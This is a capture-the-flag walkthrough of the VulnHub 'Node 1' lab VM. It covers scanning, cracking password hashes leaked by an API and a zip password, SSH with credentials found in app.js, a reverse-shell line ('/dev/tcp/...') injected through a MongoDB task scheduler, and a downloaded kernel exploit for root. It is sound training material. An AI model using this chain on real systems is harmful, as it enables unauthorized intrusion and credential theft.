Preface
⏰Date: 2023.7.30
🗺️Target VM: https://www.vulnhub.com/entry/node-1,252/
⚠️Every operation in this article was carried out in a simulated target-VM environment; never use them against real systems without authorization.
🙏My skills are limited; if there are mistakes, please point them out. Thank you for reading!
🎉Follows, likes, favourites and comments are welcome
Information gathering
Host discovery
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.58.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-29 22:43 HKT
Nmap scan report for 192.168.58.1
Host is up (0.00014s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.58.2
Host is up (0.000085s latency).
MAC Address: 00:50:56:EB:56:98 (VMware)
Nmap scan report for 192.168.58.164
Host is up (0.00018s latency).
The target this time is 192.168.58.164
Use masscan to probe which ports are open
┌──(root㉿Erik)-[~]
└─# masscan --rate=10000 -p 1-65535 192.168.58.164
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-07-30 02:57:59 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 3000/tcp on 192.168.58.164
Discovered open port 22/tcp on 192.168.58.164
Use nmap to probe the port banners further
┌──(root㉿Erik)-[~]
└─# nmap -A -T4 -p 22,3000 192.168.58.164
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-30 10:59 HKT
Nmap scan report for 192.168.58.164
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
|_http-title: MyPlace
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
MAC Address: 00:0C:29:F2:87:EF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (97%), Linux 3.13 (94%), Linux 4.2 (94%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Android 5.0 - 6.0.1 (Linux 3.4) (91%), Linux 2.6.32 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
First take a look at the service on port 3000
The page hands out three usernames directly: tom, mark, rastating
The API leaks password hashes
Capturing the site's traffic with Burp shows that an API exists
┌──(root㉿Erik)-[~]
└─# curl -s 192.168.58.164:3000/api/users | python -m json.tool
[
{
"_id": "59a7365b98aa325cc03ee51c",
"username": "myP14ceAdm1nAcc0uNT",
"password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
"is_admin": true
},
{
"_id": "59a7368398aa325cc03ee51d",
"username": "tom",
"password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
"is_admin": false
},
{
"_id": "59a7368e98aa325cc03ee51e",
"username": "mark",
"password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
"is_admin": false
},
{
"_id": "59aa9781cced6f1d1490fce9",
"username": "rastating",
"password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
"is_admin": false
}
]
Extract the password hashes and save them to hash.txt
┌──(root㉿Erik)-[~]
└─# curl -s 192.168.58.164:3000/api/users | python -m json.tool| grep pass|cut -d '"' -f4 |tee hash.txt
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0
Extract the usernames and save them to users.txt
┌──(root㉿Erik)-[~]
└─# curl -s 192.168.58.164:3000/api/users | python -m json.tool|grep user|cut -d '"' -f4|tee users.txt
myP14ceAdm1nAcc0uNT
tom
mark
rastating
Crack them with hashcat
┌──(root㉿Erik)-[~]
└─# hashcat -a 0 -m 1400 hash.txt /usr/share/wordlists/rockyou.txt --show
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
┌──(root㉿Erik)-[~]
└─# hashcat -a 0 -m 1400 hash.txt /usr/share/wordlists/rockyou.txt --show|cut -d ':' -f2|tee passwd.txt
manchester
spongebob
snowflake
┌──(root㉿Erik)-[~]
└─# paste -d ':' users.txt passwd.txt |tee ssh.txt
myP14ceAdm1nAcc0uNT:manchester
tom:spongebob
mark:snowflake
rastating:
Try hydra against SSH with these credentials
┌──(root㉿Erik)-[~]
└─# hydra -C ssh.txt -e nsr ssh://192.168.58.164
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-30 14:42:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries, ~1 try per task
[DATA] attacking ssh://192.168.58.164:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-07-30 14:42:22
Apparently these are not the SSH credentials
Log in and download the backup
Log in to the site: myP14ceAdm1nAcc0uNT:manchester gets us the admin account
It prompts us to download a backup
Analyse the file
┌──(root㉿Erik)-[/tmp]
└─# file myplace.backup
myplace.backup: ASCII text, with very long lines (65536), with no line terminators
Part of the content:
ydGlhbHMvcHJvZmlsZS5odG1sVVQFAAMimapZdXgLAAEEAAAAAAQAAAAAUEsBAh4DFAAJAAgAfWMiS4Tw22u4BAAAFQ8AABgAGAAAAAAAAQAAALSBtvUlAHZhci93d3cvbXlwbGFjZS9hcHAuaHRtbFVUBQADvpWqWXV4CwABBAAAAAAEAAAAAFBLBQYAAAAAXwNfA3edAQDQ+iUAAAA=
That looks like base64; decode it first
┌──(root㉿Erik)-[/tmp]
└─# cat myplace.backup|base64 -d > decode.backup
┌──(root㉿Erik)-[/tmp]
└─# file decode.backup
decode.backup: Zip archive data, at least v1.0 to extract, compression method=store
Rename it with a .zip suffix and extract it
┌──(root㉿Erik)-[/tmp]
└─# mv decode.backup myplace.zip
┌──(root㉿Erik)-[/tmp]
└─# unzip myplace.zip
Archive: myplace.zip
creating: var/www/myplace/
[myplace.zip] var/www/myplace/package-lock.json password:
Crack the archive password
┌──(root㉿Erik)-[/tmp]
└─# fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt myplace.zip
'var/www/myplace/' is not encrypted, skipping
found file 'var/www/myplace/package-lock.json', (size cp/uc 4404/ 21264, flags 9, chk 0145)
'var/www/myplace/node_modules/' is not encrypted, skipping
'var/www/myplace/node_modules/serve-static/' is not encrypted, skipping
found file 'var/www/myplace/node_modules/serve-static/README.md', (size cp/uc 2733/ 7508, flags 9, chk 1223)
found file 'var/www/myplace/node_modules/serve-static/index.js', (size cp/uc 1640/ 4533, flags 9, chk b964)
found file 'var/www/myplace/node_modules/serve-static/LICENSE', (size cp/uc 697/ 1189, flags 9, chk 1020)
found file 'var/www/myplace/node_modules/serve-static/HISTORY.md', (size cp/uc 2625/ 8504, flags 9, chk 35bd)
found file 'var/www/myplace/node_modules/serve-static/package.json', (size cp/uc 868/ 2175, flags 9, chk 0145)
'var/www/myplace/node_modules/utils-merge/' is not encrypted, skipping
found file 'var/www/myplace/node_modules/utils-merge/README.md', (size cp/uc 344/ 634, flags 9, chk 9f17)
found file 'var/www/myplace/node_modules/utils-merge/index.js', (size cp/uc 219/ 381, flags 9, chk 9e03)
8 file maximum reached, skipping further files
PASSWORD FOUND!!!!: pw == magicword
In the extracted files, app.js contains a MongoDB username and password
┌──(root㉿Erik)-[/tmp/var/www/myplace]
└─# cat app.js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
SSH login as mark
SSH in as mark using the password from the MongoDB connection string in app.js
┌──(root㉿Erik)-[/tmp/var/www/myplace]
└─# ssh mark@192.168.58.164
The authenticity of host '192.168.58.164 (192.168.58.164)' can't be established.
ED25519 key fingerprint is SHA256:l5rO4mtd28sC7Bh8t7rHpUxqmHnGYUDxX1DHmLFrzrk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.58.164' (ED25519) to the list of known hosts.
mark@192.168.58.164's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Aug 6 23:32:28 2018 from 10.2.1.1
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)
mark@node:/home/tom$ ls -la
total 40
drwxr-xr-x 6 root root 4096 Sep 3 2017 .
drwxr-xr-x 5 root root 4096 Aug 31 2017 ..
-rw-r--r-- 1 root root 220 Aug 29 2017 .bash_logout
-rw-r--r-- 1 root root 3771 Aug 29 2017 .bashrc
drwx------ 2 root root 4096 Aug 29 2017 .cache
drwxr-xr-x 3 root root 4096 Aug 30 2017 .config
-rw-r----- 1 root root 0 Sep 3 2017 .dbshell
-rwxr-xr-x 1 root root 0 Aug 30 2017 .mongorc.js
drwxrwxr-x 2 root root 4096 Aug 29 2017 .nano
drwxr-xr-x 5 root root 4096 Aug 31 2017 .npm
-rw-r--r-- 1 root root 655 Aug 29 2017 .profile
-rw-r----- 1 root tom 33 Sep 3 2017 user.txt
There is a user.txt here that we cannot read yet; we need to move laterally to tom
Adding a MongoDB task
Look at the services tom is running
mark@node:/tmp$ ps aux |grep tom
tom 1558 0.0 4.6 1009080 34956 ? Ssl 03:21 0:02 /usr/bin/node /var/scheduler/app.js
tom 1613 0.0 7.5 1051820 57212 ? Ssl 03:21 0:11 /usr/bin/node /var/www/myplace/app.js
Look at /var/scheduler/app.js, which runs as tom
mark@node:/tmp$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);
});
Log in to MongoDB with mark's credentials
mark@node:/home/tom$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
Create a reverse-shell script and add the command that runs it to the tasks collection
printf '#!/bin/bash\n\n /bin/bash -i >& /dev/tcp/192.168.58.153/5555 0>&1\n' > rshell;chmod 4777 rshell;
mark@node:/home/tom$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> db.tasks.insert({_id: 0, cmd: "/tmp/rshell"})
WriteResult({ "nInserted" : 1 })
> db.tasks.find({})
{ "_id" : 0, "cmd" : "/tmp/rshell" }
Privilege escalation to root
tom@node:/tmp# uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
wget https://www.exploit-db.com/download/44298
mark@node:/tmp$ mv 44298 44298.c
mark@node:/tmp$ gcc 44298.c
mark@node:/tmp$ ls
44298.c
a.out
mark@node:/tmp$ ./a.out
task_struct = ffff880027910000
uidptr = ffff8800039eb784
spawning root shell
root@node:/tmp# ls /root
root.txt
root@node:/tmp# cat /root/r*
1722e99ca5f353b362556a62bd5e6be0